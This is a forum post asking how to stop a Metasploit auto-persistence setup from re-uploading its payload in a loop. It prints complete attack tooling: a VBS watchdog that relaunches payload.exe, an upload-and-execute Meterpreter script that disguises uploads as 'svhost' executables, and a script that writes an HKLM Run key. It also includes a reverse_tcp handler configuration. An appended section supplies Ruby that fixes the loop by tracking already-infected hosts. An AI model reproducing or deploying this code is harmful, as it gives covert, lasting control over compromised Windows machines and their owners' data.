
Metasploit automation issue on persistent



scorpoin
2013-07-09, 04:13
Greetings,


I'm working on automating persistence. So far I've found a nice script from darkraptor; thanks to him for such a nice effort. Everything is working fine, the only issue is that persistence gets stuck in a kind of loop. That is, when a connect-back hits, my persistence post-attack retries uploading the files to the victim, so it's stuck and keeps uploading. I'm posting the scripts.


Custom VBS for persistence, which I placed in my /root path for uploading payload.exe and the VBS file to the victim.



' Watchdog loop: keep payload.exe running and relaunch it whenever it is not found
Set WshShell = WScript.CreateObject("WScript.Shell")
vFound = False
state = 1
While state = 1
    ' Enumerate the running processes through WMI
    Set colProcessList = GetObject("Winmgmts:").ExecQuery("Select * from Win32_Process")
    For Each objProcess In colProcessList
        If objProcess.Name = "payload.exe" Then
            vFound = True
        End If
    Next
    If vFound = True Then
        WScript.Sleep 5000
    Else
        ' Not running: start it, then wait before checking again
        WshShell.Run ("C:\WINDOWS\temp\payload.exe")
        WScript.Sleep 5000
    End If
    vFound = False
Wend




Path where I placed the custom scripts I've used:

Metasploit/apps/pro/msf3/scripts/meterpreter

This is upload.rc


# $Id$
# $Revision$
#
# Meterpreter script: upload a file to the target and execute it.
# Run from a Meterpreter session, so `client` and `args` are provided by the framework.

session = client
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-e" => [ true,  "Executable or script to upload to target host." ],
  "-o" => [ true,  "Options for executable." ],
  "-p" => [ true,  "Path on target to upload executable, default is %TEMP%." ],
  "-v" => [ false, "Verbose, return output of execution of uploaded executable." ],
  "-r" => [ false, "Remove the executable after running it (only works if the executable exits right away)" ]
)

################## Function Declarations ##################
def usage()
  print_line "UploadExec -- upload a script or executable and run it"
  print_line(@@exec_opts.usage)
  raise Rex::Script::Completed
end

# Upload +file+ to +trgloc+ on the target (default %TEMP%) under a randomised name:
# .exe files become svhostNN.exe, anything else TMPNN.<ext>. Returns the remote path.
def upload(session, file, trgloc = "")
  if not ::File.exist?(file)
    raise "File to upload does not exist!"
  else
    if trgloc.to_s.empty?
      location = session.fs.file.expand_path("%TEMP%")
    else
      location = trgloc
    end
    begin
      ext = file[file.rindex(".") .. -1]
      if ext and ext.downcase == ".exe"
        fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
      else
        fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
      end
      print_status("\tUploading #{file}....")
      session.fs.file.upload_file("#{fileontrgt}", "#{file}")
      print_status("\t#{file} uploaded!")
      print_status("\tUploaded as #{fileontrgt}")
    rescue ::Exception => e
      print_status("Error uploading file #{file}: #{e.class} #{e}")
      raise e
    end
  end
  return fileontrgt
end

# Execute +cmdexe+ on the target; with verbose == 1 the process is channelized
# and its output is read back and printed.
def cmd_on_trgt_exec(session, cmdexe, opt, verbose)
  r = ''
  session.response_timeout = 120
  if verbose == 1
    begin
      print_status "\tRunning command #{cmdexe}"
      r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
      while (d = r.channel.read)
        print_status("\t#{d}")
      end
      r.channel.close
      r.close
    rescue ::Exception => e
      print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
      raise e
    end
  else
    begin
      print_status "\tRunning command #{cmdexe}"
      r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
      r.close
    rescue ::Exception => e
      print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
      raise e
    end
  end
end

# Delete +path+ on the target through cmd.exe and wait for the deletion to finish.
def m_unlink(session, path)
  r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => true})
  while (r.name)
    select(nil, nil, nil, 0.10)
  end
  r.close
end

# Check for a supported Meterpreter platform
def unsupported
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end
unsupported if client.platform !~ /win32|win64/i

# Parsing of options
file = ""
cmdopt = nil
helpcall = 0
path = ""
verbose = 0
remove = 0
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-e"
    file = val || ""
  when "-o"
    cmdopt = val
  when "-p"
    path = val
  when "-v"
    verbose = 1
  when "-h"
    helpcall = 1
  when "-r"
    remove = 1
  end
}

if args.length == 0 || helpcall == 1
  usage
end
print_status("Running Upload and Execute Meterpreter script....")
exec = upload(session, file, path)
cmd_on_trgt_exec(session, exec, cmdopt, verbose)
if remove == 1
  print_status("\tDeleting #{exec}")
  m_unlink(session, exec)
end
print_status("Finished!")



Used smart_migrate.rb


auto.rb, this is the customized auto-persistence script:



# The first sleep below is not necessary, but makes the output cleaner
#
sleep(1)
#
print_status("Waiting on incoming sessions...")
while (true)
  framework.sessions.each_pair do |sid, s|
    thost = s.tunnel_peer.split(":")[0]
    #
    # Ensure that stdapi has been loaded before running. This branch runs for
    # every session that has stdapi, on every pass of the loop.
    if s.ext.aliases['stdapi']
      sleep(1)
      print_status("Uploading files to session #{sid} #{thost}...")
      s.console.run_single("upload payload.exe Wupd.vbs C:\\\\WINDOWS\\\\Temp")
      print_status("Executing persistent script...")
      s.console.run_single("execute -H -f 'cmd.exe /c cscript C:\\WINDOWS\\Temp\\Wupd.vbs'")
      print_status("Creating Registry Key...")
      s.console.run_single("reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v msfpersist -d 'C:\\WINDOWS\\Temp\\Wupd.vbs'")
      s.console.run_single("reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v msfpersist")
      ###print_status("Closing session #{sid} #{thost}...")
      ###s.kill
    else
      print_status("Session #{sid} #{thost} active, but not yet configured")
    end
    #
  end
  sleep(1)
end
#
print_status("All done")



Finally my auto payload and modules

mysetup.rc



use exploit/multi/handler
set lhost 192.168.1.3
set lport 8443
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set AutoRunScript multiscript.rb -rc /opt/metasploit/apps/pro/msf3/met_script.lst
exploit -j


met_script.lst



smart_migrate
auto



My final startup command



/opt/metasploit/apps/pro/msf3/msfconsole -r /opt/metasploit/apps/pro/msf3/mysetup.rc



Hope someone can help me out to avoid that looping. Looking forward to your kind response.


Regards
Scorpoin
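Added example, not code from this thread or from Metasploit. The posted auto.rb never records which sessions it has already handled, so every pass of its while(true) loop uploads to every session again, and every time Wupd.vbs relaunches payload.exe the callback is a fresh session from the same host that gets configured once more. The Ruby below keeps a set of hosts done in the current run and also checks the target's msfpersist Run value before installing, so it stays idle across the msfconsole restart in the startup command. FakeSession, the 10.0.0.x hosts and the stdapi_loaded?/run_value method names are constructed for this example; a real script would pass framework.sessions.values and read s.ext.aliases['stdapi'] and the reg queryval output instead.

```ruby
require 'set'
require 'shellwords'

# Added example (not the thread's or Metasploit's code): persist each target
# host once, instead of on every loop pass and every callback session.

PERSIST_NAME = 'msfpersist'

# Constructed stand-in for a Meterpreter session so the logic runs offline.
class FakeSession
  attr_reader :sid, :tunnel_peer, :commands, :registry

  def initialize(sid, tunnel_peer, stdapi: true, registry: {})
    @sid = sid
    @tunnel_peer = tunnel_peer   # "ip:port", like s.tunnel_peer in Meterpreter
    @stdapi = stdapi             # stands in for s.ext.aliases['stdapi']
    @registry = registry         # simulated HKLM\...\CurrentVersion\Run values
    @commands = []               # every console command the driver issued
  end

  def stdapi_loaded?
    @stdapi
  end

  # Stands in for s.console.run_single. The real console tokenises the line
  # with Shellwords, so the same backslash rules apply; a "reg setval" is
  # applied to the simulated Run key, everything else is only logged.
  def run_single(cmd)
    @commands << cmd
    argv = Shellwords.split(cmd)
    return unless argv[0, 2] == %w[reg setval]
    @registry[argv[argv.index('-v') + 1]] = argv[argv.index('-d') + 1]
  end

  # Stands in for "reg queryval ... -v msfpersist" (or session.sys.registry).
  def run_value(name)
    @registry[name]
  end
end

class PersistenceDriver
  attr_reader :done_hosts

  def initialize
    @done_hosts = Set.new   # hosts handled during this msfconsole run
  end

  # Decide what to do with one session; returns a symbol so the outcome can
  # be checked without parsing console output.
  def handle(s)
    return :waiting_stdapi unless s.stdapi_loaded?
    host = s.tunnel_peer.split(':')[0]
    # Guard 1: a second session from a host we already persisted is the
    # callback our own VBS produced, not a new target.
    return :skipped_host if @done_hosts.include?(host)
    # Guard 2: the Run value is the on-target marker; it survives restarts
    # of msfconsole, where the in-memory set does not.
    if s.run_value(PERSIST_NAME)
      @done_hosts << host
      return :skipped_already_persisted
    end
    install(s)
    @done_hosts << host
    :configured
  end

  # The three commands from the posted auto.rb. Ruby "\\\\" reaches Shellwords
  # as \\ and becomes one backslash; inside single quotes "\\" is kept as is.
  def install(s)
    s.run_single("upload payload.exe Wupd.vbs C:\\\\WINDOWS\\\\Temp")
    s.run_single("execute -H -f 'cmd.exe /c cscript C:\\WINDOWS\\Temp\\Wupd.vbs'")
    s.run_single("reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run " \
                 "-v #{PERSIST_NAME} -d 'C:\\WINDOWS\\Temp\\Wupd.vbs'")
  end

  # One pass over the current sessions, returning sid => outcome. An
  # AutoRunScript is started once per new session, so one pass per
  # invocation replaces the posted while(true) loop.
  def drive(sessions)
    sessions.each_with_object({}) { |s, out| out[s.sid] = handle(s) }
  end
end

if __FILE__ == $0
  driver = PersistenceDriver.new
  sessions = [
    FakeSession.new(1, '10.0.0.5:49152'),                 # fresh target
    FakeSession.new(2, '10.0.0.5:49160'),                 # callback from Wupd.vbs, same host
    FakeSession.new(3, '10.0.0.9:49201',
                    registry: { PERSIST_NAME => 'C:\WINDOWS\Temp\Wupd.vbs' }), # done before a restart
    FakeSession.new(4, '10.0.0.7:49300', stdapi: false)   # stdapi not loaded yet
  ]
  driver.drive(sessions).each { |sid, outcome| puts "session #{sid}: #{outcome}" }
end
```

Running the file prints one outcome per constructed session: host 10.0.0.5 is configured once and its second session is skipped, 10.0.0.9 is left alone because its Run value already exists, and 10.0.0.7 is reported as waiting for stdapi. Inside Metasploit the driver (or at least the host set, for instance a global such as `$persisted_hosts ||= Set.new`, an assumption about how to share state between AutoRunScript invocations) has to live outside the script body, because each new session starts a fresh copy of the script.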